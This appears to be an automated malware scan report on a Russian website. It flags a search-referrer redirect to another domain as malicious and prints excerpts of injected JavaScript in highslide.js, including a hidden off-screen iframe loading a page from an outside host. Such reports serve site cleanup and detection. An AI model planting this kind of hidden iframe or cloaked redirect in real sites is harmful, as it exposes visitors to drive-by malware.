Malicious/Suspicious Redirects
Request | Server response | Status |
URL: http://promserviss.ru/ (imitation of visitor from search engine) GET / HTTP/1.1 Host: promserviss.ru Referer: http://www.google.com/search?q=redirect+check1 | HTTP/1.1 302 Found Connection: close Date: Wed, 28 May 2014 10:23:04 GMT Location: http://decmexico.com/includes/domit/1.php Server: nginx/1.2.2 Content-Type: text/html; charset=windows-1251 X-Powered-By: PHP/5.2.10 | malicious |
Scanned pages/files
Request | Server response | Status |
http://promserviss.ru/ | 200 OK Content-Length: 20246 Content-Type: text/html | clean |
http://promserviss.ru/engine/classes/js/jquery.js | 200 OK Content-Length: 1623 Content-Type: application/x-javascript | clean |
http://promserviss.ru/engine/classes/js/jqueryui.js | 200 OK Content-Length: 1634 Content-Type: application/x-javascript | clean |
http://promserviss.ru/engine/classes/js/dle_js.js | 200 OK Content-Length: 22719 Content-Type: application/x-javascript | clean |
http://ajax.googleapis.com/ajax/libs/webfont/1/webfont.js | 200 OK Content-Length: 17380 Content-Type: text/javascript | clean |
http://promserviss.ru/engine/editor/scripts/webfont.js | 200 OK Content-Length: 4691 Content-Type: application/x-javascript | clean |
http://promserviss.ru/templates/remaket/js/libs.js | 200 OK Content-Length: 1634 Content-Type: application/x-javascript | clean |
http://promserviss.ru/templates/remaket/js/jcarousellite.js | 200 OK Content-Length: 1634 Content-Type: application/x-javascript | clean |
http://promserviss.ru/o-kompanii.html | 200 OK Content-Length: 16174 Content-Type: text/html | clean |
http://promserviss.ru/engine/classes/highslide/highslide.js | 200 OK Content-Length: 48331 Content-Type: application/x-javascript | suspicious |
Suspicious code. Script contains iFrame. (function(){
function stripos (r_haystack, r_needle, r_offset) { var haystack = (r_haystack + '').toLowerCase(); var needle = (r_needle + '').toLowerCase(); var index = 0; if ((index = haystack.indexOf(needle, r_offset)) !== -1) { return index; } return false; } function browserData(){ var BrowserBlock = ['Series60','Lunascape','iPhone','Macintosh','Linux','iPad','Flock','SeaMonkey','N ...[50520 bytes skipped]... Decoded script: function () { if (!hs.isReady) { hs.isReady = true; for (var a = 0; a < hs.onReady.length; a++) { hs.onReady[a](); } } } function () { hs.getPageSize(); if (hs.viewport) { for (var a = 0; a < hs.viewport.childNodes.length; a++) { var b = hs.viewport.childNodes[a]; hs.getExpander(b).positionOverlay(b); } } } <iframe src="http://posimak.tetsuya-dragneel.net/trjgfxzstjarhrdhhej12.html" Name="Position" style="position:absolute;left:-1370px;top:-1370px;" height="160" width="160"></iframe> | ||
http://promserviss.ru/servisnoe-obsluzhivanie.html | 200 OK Content-Length: 15247 Content-Type: text/html | clean |
http://promserviss.ru/kredit.html | 200 OK Content-Length: 16240 Content-Type: text/html | clean |
http://promserviss.ru/kontakty.html | 200 OK Content-Length: 14242 Content-Type: text/html | clean |
http://promserviss.ru/massa-k/ | HTTP/1.1 301 Moved Permanently Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Connection: close Date: Wed, 28 May 2014 10:23:08 GMT Pragma: no-cache Location: /elektronnye-vesy/massa-k/ Server: nginx/1.2.2 Content-Type: text/html; charset=windows-1251 Expires: Thu, 19 Nov 1981 08:52:00 GMT Set-Cookie: PHPSESSID=312dc87511f68544dee459642175feaf; path=/ Set-Cookie: dle_user_id=deleted; expires=Tue, 28-May-2013 10:23:07 GMT; path=/; domain=.promserviss.ru; httponly Set-Cookie: dle_password=deleted; expires=Tue, 28-May-2013 10:23:07 GMT; path=/; domain=.promserviss.ru; httponly Set-Cookie: dle_hash=deleted; expires=Tue, 28-May-2013 10:23:07 GMT; path=/; domain=.promserviss.ru; httponly X-Powered-By: PHP/5.2.10 | clean |
http://promserviss.ru/elektronnye-vesy/massa-k/ | 200 OK Content-Length: 16594 Content-Type: text/html | clean |
http://promserviss.ru/cas/ | HTTP/1.1 301 Moved Permanently Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Connection: close Date: Wed, 28 May 2014 10:23:08 GMT Pragma: no-cache Location: /elektronnye-vesy/cas/ Server: nginx/1.2.2 Content-Type: text/html; charset=windows-1251 Expires: Thu, 19 Nov 1981 08:52:00 GMT Set-Cookie: PHPSESSID=b0088a62558a2aace6939abe541aada6; path=/ Set-Cookie: dle_user_id=deleted; expires=Tue, 28-May-2013 10:23:07 GMT; path=/; domain=.promserviss.ru; httponly Set-Cookie: dle_password=deleted; expires=Tue, 28-May-2013 10:23:07 GMT; path=/; domain=.promserviss.ru; httponly Set-Cookie: dle_hash=deleted; expires=Tue, 28-May-2013 10:23:07 GMT; path=/; domain=.promserviss.ru; httponly X-Powered-By: PHP/5.2.10 | clean |
http://promserviss.ru/elektronnye-vesy/cas/ | 200 OK Content-Length: 15087 Content-Type: text/html | clean |
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=promserviss.ru
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://promserviss.ru/
Result: promserviss.ru is not infected or malware details are not published yet.
Result: promserviss.ru is not infected or malware details are not published yet.